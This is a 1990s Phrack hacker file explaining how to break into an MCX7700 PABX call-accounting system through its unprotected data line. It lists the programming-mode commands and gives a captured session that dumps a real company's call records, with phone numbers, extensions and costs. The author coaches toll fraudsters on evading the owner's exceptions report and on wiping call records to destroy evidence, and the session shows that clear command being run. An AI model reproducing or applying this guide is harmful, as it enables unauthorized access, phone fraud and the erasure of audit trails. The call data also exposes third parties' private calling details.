                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Five, File 25 of 28

****************************************************************************


 ///////////////          THE MCX7700 PABX SYSTEM            ////////////////
///////////////   Brought to you courtesy of [)elamo Labz   ////////////////
//////////////    and the ChUrCH oF tHE Non-CoNForMiST++  ////////////////
               (warespeoplessuckwarespeoplessucksuksuk)

Greetings from myself, The Evil [)r. [)elam!

In this text file I present a PBX that identifies itself as an "MCX7700"...
probably the easiest PBX hack you'll find, and not a bad system... I've seen
worse.



Dis'-claimer: (This is the part where I get to Dis' the system.)
-------------
This particular system is wide open and it's not my problem the owners
decided to buy a lame system.  Via freedom of the press I am publishing
my findings, so if anyone gets pissed off about this file *PHUCK 0FF*!



Ab-Using the system:
--------------------
Once a data connection is established, press the '*' key to enter
programming mode.  In programming mode, all commands are given as 2 digit
combinations.  Some of the commands are macros of other commands. Example:
command 50 will do a command 15 plus enter a response to the question "Clear
all call records Yes/No".  This particular system uses only extensions..
not accounts, but has the capability to do both.  The system sends EOF
(CTRL-Z) characters after every command, this is NOT something I typed.
I replaced all occurrences of CTRL-Z characters with <-CTRL Z-> in this phile
for obvious reasons.



Note to |<odez |<iddiez:
------------------------
For all you kiddiez who think you can bang the fuck outta codez and never
get caught, you might think again after reading this phile.  Command 55
"Exceptions report" is most likely what the system owner looks at every
month.  The report includes Most Expensive Calls, Longest Calls, and Most
Frequently Called Numbers.  Avoiding being caught is as simple as hiding
among the rest of the crowd. I.E. don't fucking call Japan or stay on for 8
hours, and don't call the same BBS 100 times on a code in a month.  The
administrator most likely will glance at the printout and see which
department has a fuckup in it who calls his mistress in Egypt every day, and
go rag him out... if you're not one of the top in the exceptions report,
chances are they'll never know.  If you happen to have the dataline to the
PBX then who the fuck cares.. just clear the fucking call records.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


List of Commands:
-----------------
00 Terminate programming
10 System parameters menu (PRINTER = 1 / PABX = 2 / REPORT = 3 / OPTIONS = 4)
11 Change current time
12 Change current date
15 Clear all call records Y/N
16 Set start date
17 Set trunk assignments
18 Set group number
19 "STORED NUMBER ENTRY, 4=ABVD, 5-8=OCC ?"
30 Show system parameters
31 Summary of extensions sort
32 Summary of accounts sort
33 Summary of departments sort
34 Summary of company sort
35 Summary of trunks sort
36 Report of all call records
37 Show trunk assignments
38 Show extension/department assignments
39 Show stored numbers
43 <this command froze>
44 Reports a number
45 ?
46 Block Check
50 Clear all call records macro.. pipes a yes into command 15
51 <terminated programming>
52 <terminated programming>
53 Sort call stats by a specified phone number
54 Area code sort
55 Exceptions reports (Most expensive / longest / most frequent calls)
60 "INTERACTIVE MODE"
61 <strange>
62 <nothing>
63 <this command froze>
64 Displays a number (5997777B)
65 Displays system type (MCX-7700/PC V4.0.5  1189)
67 Set SMDR input
68 Display SMDR inputs
69 <shows a line of numbers 01-79>
70 Full buffer program
71 Auto report program 1
72 Auto report program 2
73 Set index number
74 Set rate table
75 Rate table sizes
76 Pricing types
79 <nothing>
80 <strange>
90 Display full buffer program
91 Display auto report program 1
92 Display auto report program 2
93 List index table
94 List rate table
95 Display rate table sizes
96 Display pricing types
97 Invalid command
98 Invalid command
99 Call record dump


"*" key starts programming mode
<ESC> key aborts commands: "+++ FUNCTION CANCELED +++"


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Here's a capture from a session online. (edited for brevity)
Settings: Wordlength 8, Parity None, Stop bits 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CONNECT 1200

<< Pressed '*' key >>

PROGRAMMING ENABLED 09/05/92  8:31A
<-CTRL Z->
COMMAND ?15
CLEAR CALL RECORDS - ARE YOU SURE ? <-CTRL Z->
COMMAND ?17
SET TRUNK ASSIGNMENTS

POSITION ? -+++ FUNCTION CANCELED +++
<-CTRL Z->
COMMAND ?30

SYSTEM PARAMETERS]

PRTR  DIAGNOSTICS  SMDR  FORM-FEED     EXPAND      ESC
TYPE  A    R    D  BAUD  SIM   LNG   ON     OFF    SEQ
 2    N    N    N    2    N    66    014    015    000

 ACCOUNTS      ------TRUNKS------   EXT   ACCESS   TOLL
SIZE    NO.    NO.   '-'  GRP  EQP SIZE  ABS  COST DIG
 04    1024    040    N    2    3    3    Y    N    1

CALL   ----DROP OR REJECT---  AUTO  TO-  LIST
GRACE LOC  ACT  INC  TRK  EXT  PRD  DAY  NULL
 05    N    N    N    N    N    0    Y    N

SER  PC   ZERO
IAL  PORT  OPR
 Y    Y    Y

<-CTRL Z->
COMMAND ?35
TRUNK USAGE SORT: SUMMARY ?Y
                       SUMMARY OF TRUNK USAGE


    REPORT PERIOD                                                    PAGE  1
    09/01/92 - 09/05/92                                     09/05/92   8:35A

     TRUNK       TOTAL       TOTAL       AVG TIME     COSTED         TOTAL
     USED        CALLS       TIME        PER CALL      TIME          COST
    ------      ------      -------      --------     ------      ----------
      8080           0           0          0.0            0      $     0.00
      8086           0           0          0.0            0      $     0.00
      8087           0           0          0.0            0      $     0.00
     80001           9          47          5.2           12      $     3.11
     80002           6          12          2.0            7      $     2.13
     80003          17          57          3.3            7      $     2.21
     80004          12          35          2.9            9      $     2.21
     80005          12          15          1.2            4      $     1.50
     80006          13          24          1.8            0      $     0.00
     80007           6          19          3.1            9      $     2.42
     80008          12          39          3.2            1      $     0.25
     80009          10          45          4.5           17      $     4.50
     80010           8          42          5.2            9      $     2.30
     80011          14          46          3.2           10      $     2.61
     80012          11          98          8.9           70      $    16.14
     80013           8          26          3.2            3      $     1.21
     80014          13          34          2.6           12      $     3.03
     80015          14          32          2.2            5      $     1.50
     80016           0           0          0.0            0      $     0.00
     86001           0           0          0.0            0      $     0.00
     86003           0           0          0.0            0      $     0.00
     87001          82         270          3.2          270      $    60.31
     87002          79         256          3.2          256      $    59.52
     84002           0           0          0.0            0      $     0.00
     95001           0           0          0.0            0      $     0.00
                     0           0          0.0            0      $     0.00
    ------      ------      -------      --------     ------      ----------
     TOTAL         326        1097          3.3          701      $   164.95


<-CTRL Z->
COMMAND ?36
CALL RECORD DUMP :
 DETAIL?Y
              REPORT OF ALL CALL RECORDS


    REPORT PERIOD                                                    PAGE  1
    09/01/92 - 09/05/92                                     09/05/92   8:36A

  EXTEN-  TRUNK      NUMBER                      DURATION             ACCOUNT
   SION   USED       DIALED        DATE    TIME   MINUTES   COST        CODE
  ------ ------ ---------------- -------- ------ -------- -------- ------------
    718   80009    (   )911-0000 09/01/92  7:55A     0.5  $    .00
    311   80011    (   )911-0000 09/01/92  7:55A     1.3  $    .00
    278   80009    (800)944-1535 09/01/92  8:16A     3.0  $    .00
    255   80005    (800)944-1535 09/01/92  8:19A     1.3  $    .00
    261   87001    (   )660-5525 09/01/92  8:28A     4.2  $    .95
    201   80004    (800)944-1535 09/01/92  8:33A     1.9  $    .00
    315   87002    (   )841-2586 09/01/92  8:34A     2.3  $    .57
    314   87001    (   )290-1030 09/01/92  8:44A     3.4  $    .76
    735   87002    (813)293-4319 09/01/92  8:44A     2.5  $    .71
    735   87002    (813)293-4319 09/01/92  8:58A     1.2  $    .49
    255   80009    (800)944-1535 09/01/92  8:56A     6.9  $    .00
    247   80015    (800)944-1535 09/01/92  9:02A     3.7  $    .00
    261   80011  O (513)825-3931 09/01/92  9:09A     3.6  $    .00
    261   87001    (   )644-1061 09/01/92  9:16A     1.3  $    .38

<<ETC....>>

<-CTRL Z->
COMMAND ?00]
PROGRAMMING TERMINATED

PROGRAMMING ENABLED 09/05/92  8:40A
<-CTRL Z->
COMMAND ?37
 ]TRUNK ASSIGNMENTS

09/05/92   8:40A  PAGE  1


TRUNK 000 =      ,00      TRUNK 001 =  8080,01      TRUNK 002 =  8086,01
TRUNK 003 =  8087,01      TRUNK 004 =      ,00      TRUNK 005 =      ,00
TRUNK 006 =      ,00      TRUNK 007 =      ,00      TRUNK 008 =      ,00
TRUNK 009 =      ,00      TRUNK 010 =      ,00      TRUNK 011 =      ,00
TRUNK 012 =      ,00      TRUNK 013 =      ,00      TRUNK 014 =      ,00
TRUNK 015 =      ,00      TRUNK 016 = 80001,01      TRUNK 017 = 80002,01
TRUNK 018 = 80003,01      TRUNK 019 = 80004,01      TRUNK 020 = 80005,01
TRUNK 021 = 80006,01      TRUNK 022 = 80007,01      TRUNK 023 = 80008,01
TRUNK 024 = 80009,01      TRUNK 025 = 80010,01      TRUNK 026 = 80011,01
TRUNK 027 = 80012,01      TRUNK 028 = 80013,01      TRUNK 029 = 80014,01
TRUNK 030 = 80015,01      TRUNK 031 = 80016,01      TRUNK 032 = 86001,01
TRUNK 033 = 86003,01      TRUNK 034 = 87001,01      TRUNK 035 = 87002,01
TRUNK 036 = 84002,01      TRUNK 037 = 95001,01      TRUNK 038 =      ,00
TRUNK 039 =      ,00      TRUNK 040 =      ,00
<-CTRL Z->
COMMAND ?15
CLEAR CALL RECORDS - ARE YOU SURE ? Y END DATE NOT FOUND -- CLEAR ALL ??<-CTRL Z->
<< Nice command!.. 50 is a macro using command 15  with a Y piped into it >>
OK
51
<-CTRL Z->]
<-CTRL Z->
COMMAND ?54
AREA CODE SORT

                        SUMMARY OF AREA CODES


    REPORT PERIOD                                                    PAGE  1
    09/01/92 - 09/05/92                                     09/05/92   9:15A

     AREA       TOTAL        TOTAL      AVG TIME      AVERAGE        TOTAL
     CODE       TIME         CALLS      PER CALL       COST          COST
    ------     -------      ------      --------     --------     ----------
      ***         357          139         2.5       $    .52     $    72.89
      212          24            8         3.0       $    .84     $     6.75
      215           1            1         1.0       $    .46     $     0.46
      216           4            1         4.0       $    .92     $     0.92
      303           6            3         2.0       $    .58     $     1.75
      305           3            2         1.5       $    .38     $     0.77
      404           4            2         2.0       $    .69     $     1.38
      504           3            2         1.5       $    .46     $     0.92
      508           5            4         1.2       $    .37     $     1.50
      513          11            2         5.5       $    .80     $     1.61
      516          19            4         4.7       $   1.18     $     4.75
      606          11            1        11.0       $   2.53     $     2.53
      612           1            1         1.0       $    .50     $     0.50
      615           5            1         5.0       $   1.15     $     1.15
      703           9            1         9.0       $   2.30     $     2.30
      708           9            3         3.0       $   1.00     $     3.00
      800         371          109         3.4       $    .00     $     0.00
      813          96           21         4.5       $   1.11     $    23.49
      818           1            1         1.0       $    .50     $     0.50
      904          93           19         4.8       $   1.21     $    23.06
      912          64            1        64.0       $  14.72     $    14.72
    ------     -------      ------      --------     --------     ----------
     TOTAL       1097          326         3.3       $    .50     $   164.95

<-CTRL Z->
COMMAND ?55
EXCEPTION REPORTS

              REPORT OF MOST EXPENSIVE CALLS


    REPORT PERIOD                                                    PAGE  1
    09/01/92 - 09/05/92                                     09/05/92   9:16A

    EXTEN-   TRUNK       NUMBER                           DURATION
     SION    USED        DIALED          DATE      TIME    MINUTES    COST
    ------  ------  ----------------   --------   ------  --------  --------
      246    80012     (912)354-2813   09/01/92    2:33P     63.5   $  14.72
      316    87001     (813)299-2068   09/03/92    4:16P     36.9   $   8.19
      248    87002     (   )863-5701   09/03/92   11:28A     21.5   $   4.89
      261    87002     (904)677-1235   09/03/92    2:20P     15.3   $   3.72
      261    87002     (904)677-1235   09/01/92    3:36P     13.1   $   3.26
      255    87001     (813)293-4319   09/04/92    9:36A     13.6   $   3.13
      270    87002     (   )649-4966   09/04/92   11:32A     14.3   $   2.85
      261    87001     (   )660-5567   09/01/92   10:16A     14.8   $   2.85
      200    87002     (904)599-1543   09/03/92    3:27P     11.2   $   2.80
      266    80009     (516)785-1200   09/03/92    3:32P     10.5   $   2.75
      261    87001     (   )660-5525   09/04/92   12:48P     13.2   $   2.66
      268    80014     (606)282-7223   09/03/92   11:00A     10.9   $   2.53
      246    87002     (904)677-2551   09/03/92    3:05P      9.7   $   2.34
      261    80010     (703)845-1400   09/01/92    9:23A      9.1   $   2.30
      316    87002     (   )290-1030   09/02/92    3:04P     11.8   $   2.28
      246    87002     (904)677-6774   09/01/92    2:20P      8.5   $   2.11
      316    87001     (   )290-1030   09/03/92    2:58P     10.5   $   2.09
      316    87001     (   )290-1030   09/02/92    8:56A      9.6   $   1.90
      316    80004     (212)605-8586   09/02/92    1:58P      6.9   $   1.75
      270    80001     (513)568-4933   09/03/92    9:15A      7.0   $   1.61


              REPORT OF LONGEST CALLS


    REPORT PERIOD                                                    PAGE  1
    09/01/92 - 09/05/92                                     09/05/92   9:16A

    EXTEN-   TRUNK       NUMBER                           DURATION
     SION    USED        DIALED          DATE      TIME    MINUTES    COST
    ------  ------  ----------------   --------   ------  --------  --------
      246    80012     (912)354-2813   09/01/92    2:33P     63.5   $  14.72
      316    87001     (813)299-2068   09/03/92    4:16P     36.9   $   8.19
      261    80001     (800)727-5663   09/04/92    2:06P     25.8   $    .00
      248    87002     (   )863-5701   09/03/92   11:28A     21.5   $   4.89
      261    87002     (904)677-1235   09/03/92    2:20P     15.3   $   3.72
      261    87001     (   )660-5567   09/01/92   10:16A     14.8   $   2.85
      270    87002     (   )649-4966   09/04/92   11:32A     14.3   $   2.85
      255    87001     (813)293-4319   09/04/92    9:36A     13.6   $   3.13
      261    87001     (   )660-5525   09/04/92   12:48P     13.2   $   2.66
      261    87002     (904)677-1235   09/01/92    3:36P     13.1   $   3.26
      260    80003     (800)999-4441   09/03/92   11:49A     12.9   $    .00
      270    80010     (800)342-3763   09/02/92    3:32P     12.5   $    .00
      316    87002     (   )290-1030   09/02/92    3:04P     11.8   $   2.28
      252    80015     (800)944-1535   09/04/92    9:00A     11.5   $    .00
      252    80008     (800)944-1535   09/02/92   11:07A     11.5   $    .00
      200    87002     (904)599-1543   09/03/92    3:27P     11.2   $   2.80
      315    80009     (800)622-4448   09/02/92   10:33A     11.2   $    .00
      268    80014     (606)282-7223   09/03/92   11:00A     10.9   $   2.53
      315    80011     (800)622-4448   09/02/92    3:35P     10.8   $    .00
      264    80012     (800)527-2274   09/03/92    3:12P     10.7   $    .00


           REPORT OF MOST FREQUENT NUMBERS


    REPORT PERIOD                                                    PAGE  1
    09/01/92 - 09/05/92                                     09/05/92   9:16A

         NUMBER             TOTAL        TOTAL         AVRG          TOTAL
         DIALED             CALLS        TIME          DRTN          COST
    ----------------       ------       -------       -----       ----------
       (   )290-1030           53          131          2.4       $    27.91
       (800)944-1535           37          121          3.2       $     0.00
       (800)812-5386           15           15          1.0       $     0.00
       (   )411-0000           13           13          1.0       $     0.00
       (   )660-5525           13           36          2.7       $     7.98
       (813)293-4319           11           38          3.4       $     9.35
       (904)677-1235            9           46          5.1       $    11.43
       (800)622-4448            8           45          5.6       $     0.00
       (   )660-5524            5           11          2.2       $     2.02
       (   )295-9119            5           11          2.2       $     2.28
       (   )660-5528            5           13          2.6       $     2.47
       (516)785-1200            4           19          4.7       $     4.75
       (800)342-3064            4            4          1.0       $     0.00
       (800)888-6823            4           16          4.0       $     0.00
       (   )660-5543            4            4          1.0       $     1.14
       (508)960-6186            4            5          1.2       $     1.50
       (800)526-4371            3            6          2.0       $     0.00
       (   )863-5701            3           32         10.6       $     7.19
       (212)708-1728            3           10          3.3       $     2.75
       (303)586-2030            3            6          2.0       $     1.75

<-CTRL Z->
COMMAND ?65
MCX-7700/PC V4.0.5  1189
EB4B     E46D     1265     0101
<-CTRL Z->
COMMAND ?10

SYSTEM PARAMETERS MENU

PRINTER = 1
PABX    = 2
REPORT  = 3
OPTIONS = 4

SELECT FUNCTION : 2

 ACCOUNTS      ------TRUNKS------   EXT   ACCESS   TOLL
SIZE    NO.    NO.   '-'  GRP  EQP SIZE  ABS  COST DIG
 04    1024    040    N    2    3    3    Y    N    1
 -+++ FUNCTION CANCELED +++
<-CTRL Z->
COMMAND ?10

SYSTEM PARAMETERS MENU

PRINTER = 1
PABX    = 2
REPORT  = 3
OPTIONS = 4

SELECT FUNCTION : 3

CALL   ----DROP OR REJECT---  AUTO  TO-  LIST
GRACE LOC  ACT  INC  TRK  EXT  PRD  DAY  NULL
 05    N    N    N    N    N    0    Y    N
 -+++ FUNCTION CANCELED +++
<-CTRL Z->
COMMAND ?10

SYSTEM PARAMETERS MENU

PRINTER = 1
PABX    = 2
REPORT  = 3
OPTIONS = 4

SELECT FUNCTION : 4

SER  PC   ZERO
IAL  PORT  OPR
 Y    Y    Y
 -+++ FUNCTION CANCELED +++
<-CTRL Z->
COMMAND ?00 <<00 terminate programming>>




******************************************************************************
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

Ending notes:
-------------
I've had this system laying around for the past 2 years and never gave a
flying fuck about it, yet when I find new systems I am unfamiliar with I
always wonder why the hell no one writes a phile on 'em to pass on the
knowledge.

Anyway, to all who have hacked not-so-well-known systems, or even something
you consider lame, WRITE A PHILE ON IT!!  If enough people start doing this,
a newz letter could be started.. call it LSD (Lame Systemz Digest) or
something.  Woa, what a concept!


            ++++++ Quantula Sapientia Regitur Mundus ! ++++++
       (What little wisdom is shown in the government of the world)



Greetz 2:
---------
Kaleidox, Garbage Heap & P/S, Night Ranger, Con Artist, Green Hell,
Maldoror (The OLD Hannibal), Citizen-One, Speed Demon, The Pyrotechnic,
Knight Lightning, King Cobra, Death Wish, Shadow Runner, Axiom Codex,
Phunatic Phreak, and all the other K-rad people I forgot to mention.

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
******************************************************************************
